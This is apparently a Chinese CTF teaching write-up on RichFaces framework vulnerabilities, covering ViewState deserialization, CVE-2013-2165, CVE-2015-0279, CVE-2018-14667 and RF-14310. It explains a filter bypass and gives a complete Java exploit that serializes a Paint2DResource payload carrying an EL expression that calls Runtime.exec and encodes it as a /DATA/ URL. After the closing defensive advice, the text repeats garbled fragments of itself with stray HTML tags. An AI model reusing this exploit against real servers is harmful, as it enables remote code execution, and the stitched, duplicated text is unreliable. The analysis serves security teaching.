Richfaces 框架漏洞分析与利用教学文档<\/h1>

1. 背景介绍<\/h2>
Richfaces 是一个基于 JSF (JavaServer Faces) 和 AJAX 的 Web 应用程序框架，结合了 A4J (AJAX for JavaServer Faces) 技术。本文档将详细分析 Richfaces 框架中的多个安全漏洞及其利用方法。<\/p>

2. 漏洞概览<\/h2>

文档中涉及的主要漏洞包括：<\/p>

ViewState 反序列化漏洞<\/li>
CVE-2013-2165<\/li>
CVE-2015-0279 (RF-13977)<\/li>
CVE-2018-14667<\/li>

RF-14310<\/li> <\/ol>

3. ViewState 反序列化漏洞分析<\/h2>

3.1 ViewState 技术背景<\/h3>

HTTP 是无状态的协议<\/li>
ViewState 是一种保存状态的技术<\/li>

Java 经常通过序列化对象在 HTTP 请求中传输状态（参数、ViewState、Cookies等）<\/li> <\/ul>

3.2 漏洞利用条件<\/h3>

使用客户端存储 ViewState<\/li>

禁用加密方法<\/li> <\/ol>

3.3 实际限制<\/h3>
题目环境配置使用服务端存储 ViewState，因此无法利用此漏洞。<\/p>

4. CVE-2013-2165 漏洞分析<\/h2>

4.1 漏洞位置<\/h3>
`org.ajax4jsf.resource.ResourceBuilderImpl#getResourceDataForKey<\/code> 方法<\/p>`

4.2 漏洞触发条件<\/h3>

当 key 以 "DATA" 开头时，会解密后反序列化数据<\/li>
<\/ul>
4.3 反序列化限制<\/h3>
使用 LookAheadObjectInputStream<\/code> 类进行反序列化，只允许加载白名单中的类及其子类：<\/p>
org.ajax4jsf.resource.InternetResource
org.ajax4jsf.resource.SerializableResource
javax.el.Expression
javax.faces.el.MethodBinding
javax.faces.component.StateHolderSaver
java.awt.Color
org.richfaces.renderkit.html.Paint2DResource$ImageData
org.richfaces.demo.paint2d.PaintData
<\/code><\/pre>
5. CVE-2015-0279 (RF-13977) 漏洞分析<\/h2>
5.1 漏洞位置<\/h3>
org.richfaces.resource.MediaOutputResource<\/code> 类<\/p>
5.2 漏洞描述<\/h3>
允许任意 EL (Expression Language) 表达式执行<\/p>
5.3 实际限制<\/h3>
题目环境中不存在此类，无法利用<\/p>
6. CVE-2018-14667 漏洞分析<\/h2>
6.1 漏洞位置<\/h3>
UserResource<\/code> 类<\/p>
6.2 漏洞描述<\/h3>
允许任意 EL 表达式执行<\/p>
6.3 实际限制<\/h3>
题目环境中的 UriData<\/code> 继承自 Serializable<\/code>，执行后会抛出未授权类异常，无法利用<\/p>
7. RF-14310 漏洞分析与利用<\/h2>
7.1 漏洞描述<\/h3>
与 CVE-2015-0279 类似，允许任意 EL 表达式执行<\/p>
7.2 漏洞利用链<\/h3>

使用 com.sun.facelets.el.LegacyMethodBinding<\/code> 对象<\/li>
绑定 com.sun.facelets.el.TagMethodExpression<\/code> 对象<\/li>
通过 com.sun.el.MethodExpressionImpl#invoke<\/code> 执行恶意代码<\/li>
<\/ol>
7.3 过滤机制<\/h3>
org.richfaces.renderkit.html.Paint2DResource#send<\/code> 方法中存在过滤：<\/p>

禁止字符：\<\/code>, (<\/code><\/li>
禁止关键词：getClass<\/code><\/li>
<\/ul>
7.4 绕过方法<\/h3>
利用 org.jboss.seam.el.OptionalParameterMethodExpression<\/code> 类的特性：<\/p>

getExpressionString<\/code> 和 invoke<\/code> 都使用 this.withParam<\/code><\/li>
当 invoke<\/code> 抛出 MethodNotFoundException<\/code> 异常时，使用 this.withNoParam<\/code><\/li>
<\/ol>
7.5 利用步骤<\/h3>

构造正常的 MethodExpressionImpl<\/code> 给 withParam<\/code> 通过检查<\/li>
构造恶意的表达式给 withNoParam<\/code><\/li>
通过添加空格强制抛出方法不存在的异常<\/li>
使用 LegacyMethodBinding<\/code> 封装<\/li>
<\/ol>
8. 完整利用代码<\/h2>
import<\/span> com.sun.facelets.el.LegacyMethodBinding;<\/span>
<\/span><\/span>import<\/span> org.ajax4jsf.util.base64.URL64Codec;<\/span>
<\/span><\/span>import<\/span> org.jboss.el.MethodExpressionImpl;<\/span>
<\/span><\/span>import<\/span> javax.el.MethodExpression;<\/span>
<\/span><\/span>import<\/span> javax.faces.context.FacesContext;<\/span>
<\/span><\/span>import<\/span> javax.faces.el.MethodBinding;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.OutputStream;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Modifier;<\/span>
<\/span><\/span>import<\/span> java.util.zip.Deflater;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> exp<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String pocEL =<\/span> "#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"calc\")}"<\/span>;<\/span>
<\/span><\/span>        
<\/span><\/span>        Class cls =<\/span> Class.<\/span>forName<\/span>(<\/span>"javax.faces.component.StateHolderSaver"<\/span>);<\/span>
<\/span><\/span>        Constructor ct =<\/span> cls.<\/span>getDeclaredConstructor<\/span>(<\/span>FacesContext.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>);<\/span>
<\/span><\/span>        ct.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 1. 设置ImageData
<\/span><\/span><\/span><\/span>        \/\/ 构造ImageData_paint
<\/span><\/span><\/span><\/span>        MethodExpressionImpl methodExpression1 =<\/span> new<\/span> MethodExpressionImpl(<\/span>"#{request.toString }"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> new<\/span> Class[]{<\/span>OutputStream.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>});<\/span>
<\/span><\/span>        MethodExpressionImpl methodExpression2 =<\/span> new<\/span> MethodExpressionImpl(<\/span>pocEL,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> new<\/span> Class[]{<\/span>OutputStream.<\/span>class<\/span>,<\/span> Object.<\/span>class<\/span>});<\/span>
<\/span><\/span>        
<\/span><\/span>        Constructor constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.jboss.seam.el.OptionalParameterMethodExpression"<\/span>).<\/span>getDeclaredConstructor<\/span>(<\/span>MethodExpression.<\/span>class<\/span>,<\/span> MethodExpression.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        MethodExpression methodExpression =<\/span> (<\/span>MethodExpression)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>methodExpression1,<\/span> methodExpression2);<\/span>
<\/span><\/span>        MethodBinding methodBinding =<\/span> new<\/span> LegacyMethodBinding(<\/span>methodExpression);<\/span>
<\/span><\/span>        Object _paint =<\/span> ct.<\/span>newInstance<\/span>(<\/span>null<\/span>,<\/span> methodBinding);<\/span>
<\/span><\/span>
<\/span><\/span>        Class clzz =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.richfaces.renderkit.html.Paint2DResource"<\/span>);<\/span>
<\/span><\/span>        Class innerClazz[]<\/span> =<\/span> clzz.<\/span>getDeclaredClasses<\/span>();<\/span>
<\/span><\/span>        for<\/span> (<\/span>Class c :<\/span> innerClazz)<\/span> {<\/span>
<\/span><\/span>            int<\/span> mod =<\/span> c.<\/span>getModifiers<\/span>();<\/span>
<\/span><\/span>            String modifier =<\/span> Modifier.<\/span>toString<\/span>(<\/span>mod);<\/span>
<\/span><\/span>            if<\/span> (<\/span>modifier.<\/span>contains<\/span>(<\/span>"private"<\/span>))<\/span> {<\/span>
<\/span><\/span>                Constructor cc =<\/span> c.<\/span>getDeclaredConstructor<\/span>();<\/span>
<\/span><\/span>                cc.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                Object imageData =<\/span> cc.<\/span>newInstance<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 设置ImageData_width
<\/span><\/span><\/span><\/span>                Field _widthField =<\/span> imageData.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_width"<\/span>);<\/span>
<\/span><\/span>                _widthField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                _widthField.<\/span>set<\/span>(<\/span>imageData,<\/span> 300<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 设置ImageData_height
<\/span><\/span><\/span><\/span>                Field _heightField =<\/span> imageData.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_height"<\/span>);<\/span>
<\/span><\/span>                _heightField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                _heightField.<\/span>set<\/span>(<\/span>imageData,<\/span> 120<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 设置ImageData_data
<\/span><\/span><\/span><\/span>                Field _dataField =<\/span> imageData.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_data"<\/span>);<\/span>
<\/span><\/span>                _dataField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                _dataField.<\/span>set<\/span>(<\/span>imageData,<\/span> null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 设置ImageData_format
<\/span><\/span><\/span><\/span>                Field _formatField =<\/span> imageData.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_format"<\/span>);<\/span>
<\/span><\/span>                _formatField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                _formatField.<\/span>set<\/span>(<\/span>imageData,<\/span> 2<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 设置ImageData_paint
<\/span><\/span><\/span><\/span>                Field _paintField =<\/span> imageData.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_paint"<\/span>);<\/span>
<\/span><\/span>                _paintField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                _paintField.<\/span>set<\/span>(<\/span>imageData,<\/span> _paint);<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 设置ImageData_paint
<\/span><\/span><\/span><\/span>                Field cacheableField =<\/span> imageData.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"cacheable"<\/span>);<\/span>
<\/span><\/span>                cacheableField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                cacheableField.<\/span>set<\/span>(<\/span>imageData,<\/span> false<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 设置ImageData_bgColor
<\/span><\/span><\/span><\/span>                Field _bgColorField =<\/span> imageData.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_bgColor"<\/span>);<\/span>
<\/span><\/span>                _bgColorField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>                _bgColorField.<\/span>set<\/span>(<\/span>imageData,<\/span> 0<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 2. 序列化
<\/span><\/span><\/span><\/span>                ByteArrayOutputStream byteArrayOutputStream =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>                ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>byteArrayOutputStream);<\/span>
<\/span><\/span>                objectOutputStream.<\/span>writeObject<\/span>(<\/span>imageData);<\/span>
<\/span><\/span>                objectOutputStream.<\/span>flush<\/span>();<\/span>
<\/span><\/span>                objectOutputStream.<\/span>close<\/span>();<\/span>
<\/span><\/span>                byteArrayOutputStream.<\/span>close<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 3. 加密(zip+base64)
<\/span><\/span><\/span><\/span>                byte<\/span>[]<\/span> pocData =<\/span> byteArrayOutputStream.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>                Deflater compressor =<\/span> new<\/span> Deflater(<\/span>1<\/span>);<\/span>
<\/span><\/span>                byte<\/span>[]<\/span> compressed =<\/span> new<\/span> byte<\/span>[<\/span>pocData.<\/span>length<\/span> +<\/span> 100<\/span>];<\/span>
<\/span><\/span>                compressor.<\/span>setInput<\/span>(<\/span>pocData);<\/span>
<\/span><\/span>                compressor.<\/span>finish<\/span>();<\/span>
<\/span><\/span>                int<\/span> totalOut =<\/span> compressor.<\/span>deflate<\/span>(<\/span>compressed);<\/span>
<\/span><\/span>                byte<\/span>[]<\/span> zipsrc =<\/span> new<\/span> byte<\/span>[<\/span>totalOut];<\/span>
<\/span><\/span>                System.<\/span>arraycopy<\/span>(<\/span>compressed,<\/span> 0<\/span>,<\/span> zipsrc,<\/span> 0<\/span>,<\/span> totalOut);<\/span>
<\/span><\/span>                compressor.<\/span>end<\/span>();<\/span>
<\/span><\/span>                byte<\/span>[]<\/span> dataArray =<\/span> URL64Codec.<\/span>encodeBase64<\/span>(<\/span>zipsrc);<\/span>
<\/span><\/span>
<\/span><\/span>                \/\/ 4. 打印最后的poc
<\/span><\/span><\/span><\/span>                String poc =<\/span> "\/DATA\/"<\/span> +<\/span> new<\/span> String(<\/span>dataArray,<\/span> "ISO-8859-1"<\/span>)<\/span> +<\/span> ".jsf"<\/span>;<\/span>
<\/span><\/span>                System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>poc);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>9. 关键点总结<\/h2>

漏洞选择<\/strong>：必须选择符合环境版本和配置的漏洞<\/li>
白名单绕过<\/strong>：利用白名单中允许的类构造利用链<\/li>
异常处理机制<\/strong>：利用异常处理流程绕过过滤机制<\/li>
反射技巧<\/strong>：通过反射访问非公开类和方法<\/li>
序列化处理<\/strong>：正确处理序列化和加密过程<\/li>
<\/ol>
10. 防御建议<\/h2>

升级到最新版本的 Richfaces 框架<\/li>
使用服务端存储 ViewState<\/li>
启用 ViewState 加密<\/li>
限制 EL 表达式的执行权限<\/li>
实施严格的输入过滤和验证机制<\/li>
<\/ol>

Richfaces 框架漏洞分析与利用教学文档<\/h1>

1. 背景介绍<\/h2>
Richfaces 是一个基于 JSF (JavaServer Faces) 和 AJAX 的 Web 应用程序框架，结合了 A4J (AJAX for JavaServer Faces) 技术。本文档将详细分析 Richfaces 框架中的多个安全漏洞及其利用方法。<\/p>

3. ViewState 反序列化漏洞分析<\/h2>

3.3 实际限制<\/h3>
题目环境配置使用服务端存储 ViewState，因此无法利用此漏洞。<\/p>

4. CVE-2013-2165 漏洞分析<\/h2>

4.1 漏洞位置<\/h3>
`org.ajax4jsf.resource.ResourceBuilderImpl#getResourceDataForKey<\/code> 方法<\/p>`

5. CVE-2015-0279 (RF-13977) 漏洞分析<\/h2>

5.1 漏洞位置<\/h3>
`org.richfaces.resource.MediaOutputResource<\/code> 类<\/p>`

5.3 实际限制<\/h3>
题目环境中不存在此类，无法利用<\/p>

6. CVE-2018-14667 漏洞分析<\/h2>

6.1 漏洞位置<\/h3>
`UserResource<\/code> 类<\/p>`

6.3 实际限制<\/h3>
题目环境中的 `UriData<\/code> 继承自 Serializable<\/code>，执行后会抛出未授权类异常，无法利用<\/p>`

7.1 漏洞描述<\/h3>
与 CVE-2015-0279 类似，允许任意 EL 表达式执行<\/p>

10. 防御建议<\/h2>

升级到最新版本的 Richfaces 框架<\/li>
使用服务端存储 ViewState<\/li>
启用 ViewState 加密<\/li>
限制 EL 表达式的执行权限<\/li>
实施严格的输入过滤和验证机制<\/li> <\/ol>

Richfaces 框架漏洞分析与利用教学文档<\/h1>

1. 背景介绍<\/h2> Richfaces 是一个基于 JSF (JavaServer Faces) 和 AJAX 的 Web 应用程序框架，结合了 A4J (AJAX for JavaServer Faces) 技术。本文档将详细分析 Richfaces 框架中的多个安全漏洞及其利用方法。<\/p>

3. ViewState 反序列化漏洞分析<\/h2>

3.3 实际限制<\/h3> 题目环境配置使用服务端存储 ViewState，因此无法利用此漏洞。<\/p>

4. CVE-2013-2165 漏洞分析<\/h2>

4.1 漏洞位置<\/h3> org.ajax4jsf.resource.ResourceBuilderImpl#getResourceDataForKey<\/code> 方法<\/p>

5. CVE-2015-0279 (RF-13977) 漏洞分析<\/h2>

5.1 漏洞位置<\/h3> org.richfaces.resource.MediaOutputResource<\/code> 类<\/p>

5.3 实际限制<\/h3> 题目环境中不存在此类，无法利用<\/p>

6. CVE-2018-14667 漏洞分析<\/h2>

6.1 漏洞位置<\/h3> UserResource<\/code> 类<\/p>

6.3 实际限制<\/h3> 题目环境中的 UriData<\/code> 继承自 Serializable<\/code>，执行后会抛出未授权类异常，无法利用<\/p>

7.1 漏洞描述<\/h3> 与 CVE-2015-0279 类似，允许任意 EL 表达式执行<\/p>

10. 防御建议<\/h2> 升级到最新版本的 Richfaces 框架<\/li> 使用服务端存储 ViewState<\/li> 启用 ViewState 加密<\/li> 限制 EL 表达式的执行权限<\/li> 实施严格的输入过滤和验证机制<\/li> <\/ol>

1. 背景介绍<\/h2>
Richfaces 是一个基于 JSF (JavaServer Faces) 和 AJAX 的 Web 应用程序框架，结合了 A4J (AJAX for JavaServer Faces) 技术。本文档将详细分析 Richfaces 框架中的多个安全漏洞及其利用方法。<\/p>

3.3 实际限制<\/h3>
题目环境配置使用服务端存储 ViewState，因此无法利用此漏洞。<\/p>

4.1 漏洞位置<\/h3>
`org.ajax4jsf.resource.ResourceBuilderImpl#getResourceDataForKey<\/code> 方法<\/p>`

5.1 漏洞位置<\/h3>
`org.richfaces.resource.MediaOutputResource<\/code> 类<\/p>`

5.3 实际限制<\/h3>
题目环境中不存在此类，无法利用<\/p>

6.1 漏洞位置<\/h3>
`UserResource<\/code> 类<\/p>`

6.3 实际限制<\/h3>
题目环境中的 `UriData<\/code> 继承自 Serializable<\/code>，执行后会抛出未授权类异常，无法利用<\/p>`

7.1 漏洞描述<\/h3>
与 CVE-2015-0279 类似，允许任意 EL 表达式执行<\/p>

10. 防御建议<\/h2>

升级到最新版本的 Richfaces 框架<\/li>
使用服务端存储 ViewState<\/li>
启用 ViewState 加密<\/li>
限制 EL 表达式的执行权限<\/li>
实施严格的输入过滤和验证机制<\/li> <\/ol>